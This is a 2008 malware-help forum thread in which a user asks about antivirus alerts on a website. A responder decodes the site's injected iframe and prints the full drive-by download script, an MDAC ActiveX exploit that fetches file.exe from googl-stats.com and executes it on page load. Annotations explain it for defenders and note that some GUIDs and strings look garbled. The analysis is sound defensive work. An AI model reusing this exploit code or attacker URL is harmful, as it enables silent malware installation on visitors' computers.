Malware Related => Malicious Domains => Topic started by: cconniejean on November 15, 2008, 11:13:17 pm
-
Was wondering if someone could check this for me. Getting the following alert:
'http://www.truecreditcorporate.org/'
Access to the data has been denied!
Warning: A virus or unwanted program has been found in the HTTP Data.
Requested URL: 'http://www.truecreditcorporate.org/'
Information: Contains HEUR/HTML.Malware suspicious code
Generated by AntiVir WebGuard 8.0.15.0, AVE 8.2.0.29, VDF 7.1.0.55
I also use the Finjan Secure Browsing Plug-in, and get alerts from it as well.
The requested URL was blocked due to the following reason:
Malicious Behavior Detected! The page or file you requested contains malicious code.
-
Ref: http://vurl.mysteryfcm.co.uk/?url=141195
Contains a script that decodes to:
<iframe src="http://googl-stats.com/xmlfeed/feed.xmi?SMCe" style="display:none"></iframe>
This claims to be a 500 Internal Server Error:
http://vurl.mysteryfcm.co.uk/?url=141196
... but has a script at the very bottom of the page:
<script type="text/javascript" src="?aa381f57ec228a9304da2b0a24e6c4b8n76697700n534d4365000000000000"></script>
http://vurl.mysteryfcm.co.uk/?url=141197
This loads another escaped script, which decodes to:
// Analyst note: ActiveX instantiation helper from the decoded payload.
// `o` is the host object handed in by mdac() (the element it created and
// tagged with a classid), `n` is a ProgID string. It tries six call shapes
// in turn - CreateObject with one, two and three arguments, then GetObject
// with three argument orders - and returns the first result that is truthy.
// Every failure is swallowed by an empty catch, so the probing produces no
// script errors on the victim page; r stays null when nothing works.
function CreateO(o,n)
{
var r=null;
try
{
r=o.CreateObject(n)
}
catch(e)
{
}
if(!r)
{
try
{
r=o.CreateObject(n,"")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.CreateObject(n,"","")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject("",n)
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject(n,"")
}
catch(e)
{
}
}
if(!r)
{
try
{
r=o.GetObject(n)
}
catch(e)
{
}
}
// null if all six attempts threw or returned a falsy value
return(r);
}
// Analyst note: the download-and-execute stage. Given a host object `a`
// that already passed the probe in mdac(), it requests the current page URL
// with "?5" appended (presumably the googl-stats.com page that loaded this
// script, matching the file.exe URL quoted below - confirm against the
// capture), writes the response body to file.exe in the temp folder via
// ADODB.Stream, and launches it through Shell.Application.ShellExecute.
// Returns 1 on success and 0 if no XMLHTTP object could be created.
// Defender note: the ADODB.Stream -> SaveToFile -> ShellExecute chain, and a
// browser process dropping file.exe into the user's temp folder, are the
// observable behaviours to alert on.
function Go(a)
{
// assigned without var: leaks as a global
fname="file.exe";
var exeurl=document.location+"?5";
// note: direct CreateObject here, not the CreateO fallback helper
var fso=a.CreateObject("Scripting.FileSystemobject","");
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
// GetSpecialFolder(2) is the FileSystemObject TemporaryFolder
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
// ADODB Mode 3 = adModeReadWrite
x.Mode=3;
// four XMLHTTP flavours tried in nested try/catch; the string for the
// first ProgID is split to defeat simple signature matching
try
{
nl=CreateO(a,"Micr"+"osoft.XML"+"HTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=CreateO(a,"MSXML.XMLHTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=CreateO(a,"MSXML.ServerXMLHTTP");
nl.open("GET",exeurl,false);
}
catch(e)
{
try
{
nl=new XMLHttpRequest();
nl.open("GET",exeurl,false);
}
catch(e)
{
// no usable HTTP object: give up on this host object
return 0;
}
}
}
}
// ADODB Type 1 = adTypeBinary
x.Type=1;
// synchronous GET (third arg to open was false)
nl.send(null);
// assigned without var: leaks as a global
rb=nl.responseBody;
x.Open();
x.Write(rb);
// SaveToFile option 2 = adSaveCreateOverWrite
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
// Analyst note: entry point of the payload. Walks a hard-coded,
// null-terminated list of CLSID strings; for each one it creates a DOM
// element, sets a classid attribute on it, and probes whether the resulting
// control exposes an object-creation surface (CreateO with an obfuscated
// ProgID that resembles "Shell.Application") before handing it to Go().
// Stops at the first CLSID for which Go() returns 1 and returns 1; otherwise
// returns undefined after exhausting the list.
// Caveat for IoC use: several GUIDs here are not well-formed as printed
// (wrong group lengths, e.g. the second and third entries), and the element
// name "7bje3t" and prefix "c4sid" look like garbled "object" / "clsid" -
// the decoding shown on this page is probably partial, so treat these
// strings as approximate rather than as exact indicators.
function mdac()
{
var i=0;
var target=new Array("B496C556-6513-11D0-983A-00C04FC21E36","B4963556-65A3-11D0-983A500C04FC29E30","1B9BCEDD-E37E547E1-1322-D4A210617116","0006F033-000050000-C000-000000000046","0006F031-0000-000053000-000000000046","6532070a-7664-45e6-0793-dc1f111d2fc3","64145122-B178-451D-A048-FCFDF33E033C","7F5B7F63-606F-433150A265331E03C01E3D","06723E09-F4C2-43c8-0358-09FCD1DB0766","6396725F-1B2D-4831-A9FD5874847682010","BA018599-1DB3-44f9-83B45461454C842F8","D0C07D56-7C69-43F1-B4A0-25F5A116AB19","E8C3CDDF-C120-496b-205056C07C962476B",null);
// trailing null terminates the loop
while(target[i])
{
var a=null;
a=document.createElement("7bje3t");
// unescape('53A') has no %-escapes, so it just yields "53A" as printed
a.setAttribute("classid","c4sid"+unescape('53A')+target[i]);
if(a)
{
try
{
// probe: does this control let script instantiate other COM objects?
var b=CreateO(a,"S0ell.Ap0lica4ion");
if(b)
{
if(Go(a))return 1;
}
}
catch(e)
{
}
}
i++;
}
}
// runs immediately on page load; no user interaction involved
mdac();
This seems to download the following (though the file wasn't there when I tried):
http://googl-stats.com/xmlfeed/file.exe
-
Thank you for the help. Not to change the topic a bunch, but miss your forum.
-
See your PM's ;)